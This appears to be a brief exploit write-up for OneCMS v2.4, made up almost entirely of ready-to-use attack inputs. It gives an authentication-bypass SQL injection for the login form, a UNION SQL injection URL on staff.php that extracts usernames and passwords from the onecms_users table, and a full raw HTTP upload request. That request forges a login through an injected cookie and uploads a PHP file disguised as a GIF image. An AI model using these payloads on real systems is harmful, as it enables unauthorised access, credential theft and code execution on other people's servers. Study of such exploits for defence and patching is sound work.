+-->SQL Injection (authentication bypass)

Username: admin' or 1=1 /*
Password: something

+-->SQL Injection

http://localhost/OneCMS_v2.4/staff.php?user=aaa' union select 1,username,password,1,1,1,1,1,1,1,1,1,1 from onecms_users/*

+--> Arbitrary file upload!
POST /OneCMS_v2.4/a_upload.php?view=add2 HTTP/1.0
Cookie: username=admin'or 1=1/*; password=96e79218965eb72c92a549dd5a330112; login_date=1199693273; style=Trend

-----------------------------7d84115025c
Content-Disposition: form-data; name="ss_1"; filename="C:\path\to\file\test.php"
Content-Type: image/gif

<?
phpinfo
();
?>
-----------------------------7d84115025c
Content-Disposition: form-data; name="ss2_1"


-----------------------------7d84115025c
Content-Disposition: form-data; name="type_1"

image
-----------------------------7d84115025c
Content-Disposition: form-data; name="muche"

1
-----------------------------7d84115025c
Content-Disposition: form-data; name="Submit"

Upload
-----------------------------7d84115025c--